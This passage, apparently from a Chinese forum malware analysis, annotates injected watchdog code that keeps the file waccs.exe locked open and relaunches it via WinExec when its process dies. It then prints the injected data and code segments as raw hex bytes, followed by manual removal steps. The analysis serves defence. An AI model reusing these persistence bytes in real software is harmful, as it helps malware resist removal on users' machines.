01A50008 68 80000000    PUSH 80                               ; |Attributes = NORMAL
01A5000D 6A 03          PUSH 3                                  ; |Mode = OPEN_EXISTING
01A5000F 6A 00          PUSH 0                                  ; |pSecurity = NULL
01A50011 6A 01          PUSH 1                                  ; |ShareMode = FILE_SHARE_READ
01A50013 68 00000080    PUSH 80000000                         ; |Access = GENERIC_READ
01A50018 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
01A5001B 83C0 1C       ADD EAX,1C
01A5001E 50             PUSH EAX                               ; ASCII "C:\WINDOWS\system32\waccs.exe"
01A5001F 8B4D 08       MOV ECX,DWORD PTR SS:[EBP+8]
01A50022 FF51 04       CALL DWORD PTR DS:[ECX+4]             ; kernel32.CreateFileA(以共享读的方式打开病毒主程序文件，防止被用户或安全软件删除).
01A50025 8945 F8       MOV DWORD PTR SS:[EBP-8],EAX
01A50028 BA 01000000    MOV EDX,1
01A5002D 85D2          TEST EDX,EDX                            ; 判断函数返回值.
01A5002F 74 72          JE SHORT 01A500A3                      ; 如果文件不存在，则跳出.
01A50031 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
01A50034 05 20010000    ADD EAX,120
01A50039 50             PUSH EAX                               ; /MutexName = "t3x0"
01A5003A 6A 00          PUSH 0                                  ; |InitialOwner = FALSE
01A5003C 6A 00          PUSH 0                                  ; |pSecurity = NULL
01A5003E 8B4D 08       MOV ECX,DWORD PTR SS:[EBP+8]
01A50041 FF51 08       CALL DWORD PTR DS:[ECX+8]             ; kernel32.CreateMutexA
01A50044 8945 FC       MOV DWORD PTR SS:[EBP-4],EAX
01A50047 8B55 08       MOV EDX,DWORD PTR SS:[EBP+8]
01A5004A FF52 0C       CALL DWORD PTR DS:[EDX+C]             ; ntdll.RtlGetLastWin32Error
01A5004D 3D B7000000    CMP EAX,0B7
01A50052 74 2F          JE SHORT 01A50083                      ; 判断病毒进程是否在还运行.
01A50054 8B45 F8       MOV EAX,DWORD PTR SS:[EBP-8]          ; 如果发现病毒进程不存在了，就从这里开始执行.
01A50057 50             PUSH EAX
01A50058 8B4D 08       MOV ECX,DWORD PTR SS:[EBP+8]
019B005B FF11          CALL DWORD PTR DS:[ECX]                ; kernel32.CloseHandle(关闭句柄).
01A5005D 8B55 FC       MOV EDX,DWORD PTR SS:[EBP-4]
01A50060 52             PUSH EDX
01A50061 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
019B0064 FF50 10       CALL DWORD PTR DS:[EAX+10]             ; kernel32.ReleaseMutex(释放由线程拥有的一个互斥体).
01A50067 8B4D FC       MOV ECX,DWORD PTR SS:[EBP-4]
01A5006A 51             PUSH ECX
01A5006B 8B55 08       MOV EDX,DWORD PTR SS:[EBP+8]
019B006E FF12          CALL DWORD PTR DS:[EDX]                ; kernel32.CloseHandle(关闭句柄).
01A50070 6A 00          PUSH 0
01A50072 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
01A50075 83C0 1C       ADD EAX,1C
01A50078 50             PUSH EAX                               ; ASCII "C:\WINDOWS\system32\waccs.exe"
01A50079 8B4D 08       MOV ECX,DWORD PTR SS:[EBP+8]
019B007C FF51 18       CALL DWORD PTR DS:[ECX+18]             ; kernel32.WinExec(重新调用病毒程序启动运行).
01A5007F 33C0          XOR EAX,EAX
01A50081 EB 22          JMP SHORT 01A500A5                      ; 跳出循环.
01A50083 8B55 FC       MOV EDX,DWORD PTR SS:[EBP-4]
01A50086 52             PUSH EDX
01A50087 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
01A5008A FF50 10       CALL DWORD PTR DS:[EAX+10]             ; kernel32.ReleaseMutex(释放由线程拥有的一个互斥体).
01A5008D 8B4D FC       MOV ECX,DWORD PTR SS:[EBP-4]
01A50090 51             PUSH ECX
01A50091 8B55 08       MOV EDX,DWORD PTR SS:[EBP+8]
01690094 FF12          CALL DWORD PTR DS:[EDX]                ; kernel32.CloseHandle(关闭句柄).
01A50096 68 10270000    PUSH 2710
01A5009B 8B45 08       MOV EAX,DWORD PTR SS:[EBP+8]
0169009E FF50 14       CALL DWORD PTR DS:[EAX+14]             ; kernel32.Sleep(等待).
01A500A1 ^ EB 85          JMP SHORT 01A50028                      ; 循环执行这段检测代码.
01A500A3 33C0          XOR EAX,EAX
01A500A5 8BE5          MOV ESP,EBP
01A500A7 5D             POP EBP
01A500A8 C2 0400       RETN 4                                  ; 返回(退出).

注入的数据段：
0012F550 47 9B 80 7C 24 1A 80 7C G泙|$ |
0012F558 3F E9 80 7C 31 03 93 7C ?閫|1 搢
0012F560 A7 24 80 7C 42 24 80 7C ? |B$ |
0012F568 6D 13 86 7C 43 3A 5C 57 m 唡C:\W
0012F570 49 4E 44 4F 57 53 5C 73 INDOWS\s
0012F578 79 73 74 65 6D 33 32 5C ystem32\
0012F580 77 61 63 63 73 2E 65 78 waccs.ex
0012F588 65 00 00 00 00 00 00 00 e.......
0012F590 00 00 00 00 00 00 00 00 ........
0012F598 00 00 00 00 00 00 00 00 ........
0012F5A0 00 00 00 00 00 00 00 00 ........
0012F5A8 00 00 00 00 00 00 00 00 ........
0012F5B0 00 00 00 00 00 00 00 00 ........
0012F5B8 00 00 00 00 00 00 00 00 ........
0012F5C0 00 00 00 00 00 00 00 00 ........
0012F5C8 00 00 00 00 00 00 00 00 ........
0012F5D0 00 00 00 00 00 00 00 00 ........
0012F5D8 00 00 00 00 00 00 00 00 ........
0012F5E0 00 00 00 00 00 00 00 00 ........
0012F5E8 00 00 00 00 00 00 00 00 ........
0012F5F0 00 00 00 00 00 00 00 00 ........
0012F5F8 00 00 00 00 00 00 00 00 ........
0012F600 00 00 00 00 00 00 00 00 ........
0012F608 00 00 00 00 00 00 00 00 ........
0012F610 00 00 00 00 00 00 00 00 ........
0012F618 00 00 00 00 00 00 00 00 ........
0012F620 00 00 00 00 00 00 00 00 ........
0012F628 00 00 00 00 00 00 00 00 ........
0012F630 00 00 00 00 00 00 00 00 ........
0012F638 00 00 00 00 00 00 00 00 ........
0012F640 00 00 00 00 00 00 00 00 ........
0012F648 00 00 00 00 00 00 00 00 ........
0012F650 00 00 00 00 00 00 00 00 ........
0012F658 00 00 00 00 00 00 00 00 ........
0012F660 00 00 00 00 00 00 00 00 ........
0012F668 00 00 00 00 00 00 00 00 ........
0012F670 74 33 78 30 00 00 00 00 t3x0....
0012F678 00 00 00 00 00 00 00 00 ........
0012F680 00 00 00 00 00 00 00 00 ........
0012F688 00 00 00 00 00 00 00 00 ........
0012F690 00 00 00 00 00 00 00 00 ........
0012F698 00 00 00 00 00 00 00 00 ........
0012F6A0 00 00 00 00 00 00 00 00 ........
0012F6A8 00 00 00 00 00 00 00 00 ........
0012F6B0 00                      .
----------------------------------------------------------
注入的数据段：
47 9B 80 7C 24 1A 80 7C 3F E9 80 7C 31 03 93 7C A7 24 80 7C 42 24 80 7C 6D 13 86 7C 43 3A 5C 57
49 4E 44 4F 57 53 5C 73 79 73 74 65 6D 33 32 5C 77 61 63 63 73 2E 65 78 65 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
74 33 78 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00

注入的代码段：
55 8B EC 83 EC 08 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8B 45 08 83 C0 1C 50 8B
4D 08 FF 51 04 89 45 F8 BA 01 00 00 00 85 D2 74 72 8B 45 08 05 20 01 00 00 50 6A 00 6A 00 8B 4D
08 FF 51 08 89 45 FC 8B 55 08 FF 52 0C 3D B7 00 00 00 74 2F 8B 45 F8 50 8B 4D 08 FF 11 8B 55 FC
52 8B 45 08 FF 50 10 8B 4D FC 51 8B 55 08 FF 12 6A 00 8B 45 08 83 C0 1C 50 8B 4D 08 FF 51 18 33
C0 EB 22 8B 55 FC 52 8B 45 08 FF 50 10 8B 4D FC 51 8B 55 08 FF 12 68 10 27 00 00 8B 45 08 FF 50
14 EB 85 33 C0 8B E5 5D C2 04 00 55
----------------------------------------------------------------------------------------------------
****************************************************************************************************
三、手动杀毒方法步骤(在系统真实环境下测试有效)：

1：终止关闭掉病毒保护进程“explorer.exe”(系统桌面程序)。
2：结束掉病毒进程“C:\windows\system32\waccs.exe”。
3：删除掉病毒程序文件“C:\windows\system32\waccs.exe”。
4：重新启动运行系统桌面程序“C:\windows\explorer.exe”，查杀病毒完毕。
****************************************************************************************************
////////////////////////////////////////////////////////////////////////////////////////////////////

账号		自动登录	找回密码
密码			立即注册